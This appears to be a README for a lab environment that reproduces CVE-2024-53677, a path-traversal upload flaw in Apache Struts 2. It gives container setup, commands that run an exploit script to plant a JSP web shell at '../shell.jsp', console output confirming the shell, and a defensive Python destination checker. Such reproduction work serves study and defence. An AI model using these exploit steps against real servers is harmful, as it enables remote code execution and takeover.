# CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment
Vulnerable Environment and Exploit for CVE-2024-53677
This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.
## Setup Instructions
The environment can be built and run using Podman. Follow these steps to set up the application:
```sh
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit:
```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file uploads successfully but is not accessible. To work around this, run the command once with an extra `.` added to the destination (`.../shell.jsp`), then re-run the original command:
```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp
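For the defensive side of the traversal shown in the transcript above, the following added example (not part of this repository or of Apache Struts) checks where a client-supplied destination would land before anything is written. The directory layout, function names and verdict strings are assumptions made for illustration.

```python
import posixpath

# Assumed layout (hypothetical paths): the upload directory is a direct child
# of the web root, consistent with "../shell.jsp" being served at /shell.jsp.
WEBROOT = "/srv/app/webroot"
UPLOAD_DIR = "/srv/app/webroot/uploads"
SERVER_EXECUTED = (".jsp", ".jspx")  # extensions a servlet container compiles and runs


def resolve_destination(destination, upload_dir=UPLOAD_DIR):
    """Lexically resolve a client-supplied destination the way a naive
    upload_dir + "/" + name write would, normalising backslashes first."""
    name = destination.replace("\\", "/")
    return posixpath.normpath(posixpath.join(upload_dir, name))


def is_inside(path, directory):
    """True when path is the directory itself or lies beneath it."""
    return path == directory or path.startswith(directory.rstrip("/") + "/")


def check_destination(destination, upload_dir=UPLOAD_DIR, webroot=WEBROOT):
    """Return (verdict, resolved_path) for a requested upload destination."""
    if not destination or "\x00" in destination:
        return "reject: empty or NUL byte", None
    resolved = resolve_destination(destination, upload_dir)
    executable = resolved.lower().endswith(SERVER_EXECUTED)
    if not is_inside(resolved, upload_dir):
        where = "web root" if is_inside(resolved, webroot) else "filesystem"
        kind = "server-executed file" if executable else "file"
        return f"reject: {kind} escapes upload dir into {where}", resolved
    if executable:
        return "reject: server-executed extension", resolved
    if posixpath.dirname(resolved) != upload_dir:
        return "reject: nested path, expected a bare file name", resolved
    return "accept", resolved


# Constructed inputs: the destinations from the transcript plus two controls.
SAMPLES = ["../shell.jsp", ".../shell.jsp", "newshell.jsp", "report.pdf", "sub/report.pdf"]

if __name__ == "__main__":
    for dest in SAMPLES:
        verdict, resolved = check_destination(dest)
        print(f"{dest!r:18} -> {resolved}  [{verdict}]")
```

The check is lexical only; a production handler should also canonicalise the final path on disk so that symlinks inside the upload directory cannot redirect the write.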